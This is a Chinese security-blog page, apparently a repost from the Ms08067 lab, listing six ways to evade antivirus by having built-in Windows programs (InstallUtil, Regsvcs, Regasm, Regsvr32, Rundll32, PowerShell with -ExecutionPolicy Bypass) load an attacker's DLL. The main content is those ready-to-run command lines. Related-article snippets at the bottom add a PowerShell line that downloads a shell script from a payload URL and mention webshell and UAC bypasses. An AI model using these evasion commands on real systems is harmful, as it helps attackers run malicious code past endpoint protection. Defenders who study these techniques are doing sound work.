六种bypass安全软件防护执行的方式

最新推荐文章于 2024-03-02 17:04:37 发布
最新推荐文章于 2024-03-02 17:04:37 发布
阅读量358 收藏
点赞数

在渗透测试过程中,总是会遇到各种各种的安全防护。下面通过系统自带的程序来绕过安全防护,加载我们自己想要的DLL文件:

主要有:

  1. InstallUtil.exe

  2. Regsvcs.exe

  3. Regasm.exe

  4. Regsvr32.exe

  5. Rundll32.exe

  6. Powershell

详细用法如下:

1.

x86

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

x64

C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

2.

x86

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll

x64

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll

3.

x86

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll

x64

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll

4.

x86

regsvr32 /s /u AllTheThings.dll --> Calls DllUnregisterServer

x64

regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer

5.

rundll32 AllTheThings.dll,EntryPoint

6.

直接使用powershell,加载powershell模块,具体使用的方式如下:

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!


目前20000+人已关注加入我们

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:www.ms08067.com

Ms08067安全实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
qt5 执行exe带参数_白名单InstallUtil.exe绕过火绒|腾讯管家|360杀毒等杀软
weixin_39787628的博客
11-28 703
0x00 简介ATT&CK编号: T1118战术: 防御逃避,执行平台: Windows所需权限: 用户数据源: 进程监视,进程命令行参数绕过防御: 进程白名单,数字证书验证InstallUtil 是一个命令行实用程序,它允许通过执行。net 二进制文件中指定的特定安装程序组件来安装和卸载资源。[1] InstallUtil 位于 Windows 系统的。NET 目录中: C:Wind...
powershell的执行策略和绕过
https://www.cnblogs.com/zpchcbd/
09-12 3099
执行脚本的时候 你可能会在调用的时候出现报错,这是powershell的安全执行策略,下面我们来了解一下执行策略:PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略简单介绍各种策略如下: 名称与说明: Restricted 受限制的,可以执行单个的命令,但是不能执行...
win Powershell ExecutionPolicy 执行策略
明明的博客
07-21 1639
简单说明# powershell对于脚本的执行有着严格的安全限制 Copy Get-ExecutionPolicy -List #查看当前的执行策略 Set-ExecutionPolicy -Scope CurrentUser AllSigned #设置执行策略为要求所有脚本签名,范围为当前用户 策略 Policies: Restricted / AllSigned / RemoteSigned / Unrestricted / Bypass / Undefined 范围 Scope.
win10 常见杯具
myh_fly的博客
03-25 140
vscode vscode 终端无法加载文件的问题 修改powershell Powershell 默认是不允许执行 PS1 脚本的 使用Get-ExecutionPolicy获取当前策略 总共有六种,分别是Undefined, Bypass, Unrestricted, Remotesigned, Allsigned, Restricted. Restricted. 不读取任何配置文件、不...
powershell渗透常用命令
春日野穹
02-28 1300
powershell渗透常用命令 set-ExecutionPolicy RemoteSigned //开启执行策略 set-ExecutionPolicy Restricted //关闭执行策略 远程下载文件 powershell $h=new-object System.Net.WebClient $h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh') 命令行执行ps1文件 powe
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
"免杀"再次重申了它的核心特征,即能逃避安全软件的检测。"webshell"和"phpwebshell"则明确了这是针对PHP Web服务器的恶意代码。 【压缩包子文件的文件名称】"new.bypass.php" 这个文件名揭示了Webshell的具体实现...
uacbypasslatest_bypassuac_UAC_
10-01
**UAC(用户账户控制)**是Windows操作系统中的一个安全特性,全称为User Account Control,它的主要目的是提系统的安全性,防止恶意软件在未经用户许可的情况下获得管理员权限并执行潜在有害的操作。UAC会在进行...
「安全教育」3_ZN2018_WV_-_CSP_bypass - 威胁情报.zip
12-04
这些设备是攻击者进入网络的常见入口点,因此需要有强大的安全防护,如端点保护平台(EPP)和端点检测与响应(EDR)系统,以防止恶意软件感染和数据泄漏。 3. **业务安全**:企业安全策略应涵盖整个业务流程,包括...
Offensive Security MAC Control Bypass Notes PT.1.pdf
10-06
这部分内容可能会讨论过去的著名攻击案例,以及这些案例如何推动了安全研究的进步和防护策略的改进。 综上所述,网络安全渗透测试中的MAC Control Bypass是一个复杂而重要的主题,涉及到对MacOS系统架构的深入理解...
XSSBypass:XSS绕过技术
05-17
XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义用户输入的数据时,XSS漏洞就可能发生。XSS绕过技术是...
Bypass.exe
02-02
分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票分流抢票
Powershell安全技术简单介绍
W小哥
04-08 775
Powershell基本概念 参考百度百科的解释: Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。 它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 Windows PowerShell v3将伴随着Microsoft Hyper-V 3.0和Windows Server 2012发布。PowerShell
powershell使用总结
热门推荐
Shanfenglan's blog
08-21 28万+
模块导入 Import-Module Recon Import-Module -name .\powerview.ps1 查看模块对应命令 Get-Command -Module name 其他 powershell.exe -ExecutionPolicy bypass -noprofile IEX(’’) 上述命令意思为 1、将执行策略设置为绕过,这样可以执行powershell脚本文件。 2、不加载配置文件 3、隐藏窗口 4、Iex命令为invove-expression的别名:接收一个字符串作
bypass 的简介及应用
最新发布
迈达量化的博客
03-02 1562
获取BAR(Base Address Register):在开发bypass时,需要获取PCI设备的BAR,以便在用户态应用程序中直接访问设备的寄存器和内存空间。请注意,Bypass技术的应用领域是双面刃,它可以用于正当目的,如安全测试和系统维护,也可以被滥用用于非法活动。在量化交易系统开发中,bypass是一个重要的概念,它指的是通过直连的交易通道来绕过传统的交易所接口,以提交易的速度和稳定性。游戏修改:在游戏领域,Bypass技术可以用于修改游戏的内部逻辑和规则,以获得额外的优势或改变游戏体验。
power shell执行策略(ExecutionPolicy)
苦笔的博客
11-12 2万+
#更新执行策略 Set-ExecutionPolicy <policy-name>#policy-name可能的值 Unrestricted、RemoteSigned、AllSigned、Restricted、Default、Bypass、Undefined#将ExecutionPolicy改为Unrestricted,可以运行未签名的脚本 Set-ExecutionPolicy Unrestric
Powershell ExecutionPolicy 执行策略
dianjiong1915的博客
05-23 2085
简单说明 powershell对于脚本的执行有着严格的安全限制 Get-ExecutionPolicy -List #查看当前的执行策略 Set-ExecutionPolicy -Scope CurrentUser AllSigned #设置执行策略为要求所有脚本签名,范围为当前用户 策略 Policies: Restricted / AllSigned / RemoteSigned /...
bypass功能介绍
sun007700的专栏
01-06 3386
bypass功能介绍_黄焖榴莲饭的博客-CSDN博客_bypass 硬件bypass原理介绍_weixin_33884611的博客-CSDN博客 Bypass实现的原理分析 上面简单说明了一下Bypass的控制方式,下面针对Bypass工作原理作一下简要的说明,主要从硬件和软件两个层面来分析。以研华的FWA-3140系列产品为研究对象。 硬件层面 在硬件层面上,要实现Bypass,主要使用的就是继电器。这些继电器主要连接两个Bypass网口的各个网口信号线上,下图以其中一根信号线来说明继电器在其..
ByPass
AquariusYuxin的博客
11-15 7247
一、 什么是Bypass。 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypass出面...
硬件bypass原理介绍
weixin_33884611的博客
04-04 3747
硬件bypass 原理介绍 一 硬件bypass 目的: 作为串接产品为了避免产品的单点故障,在设备出现断电,死机时,不能因为串接产品的不可用而导致用户的网络不可用,硬件Bypass功能已经是流控产品必备功能,在设备断电,死机时能够直接将内,外两个端口物理连通,变成一根网线,这样用户的数据流量可以直接通过设备,而不受设备自身当前状态的影响。 如下图所示,在...
云原生安全实践:新一代WAF构建应用防护体系
"该文档主要探讨了如何在云原生环境中构建新一代的Web应用程序防火墙(WAF),强调了云安全的重要性,以及如何利用云原生安全架构来增强应用安全防护。文中提到了当前应用安全的发展趋势,分享了成功的应用安全防护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值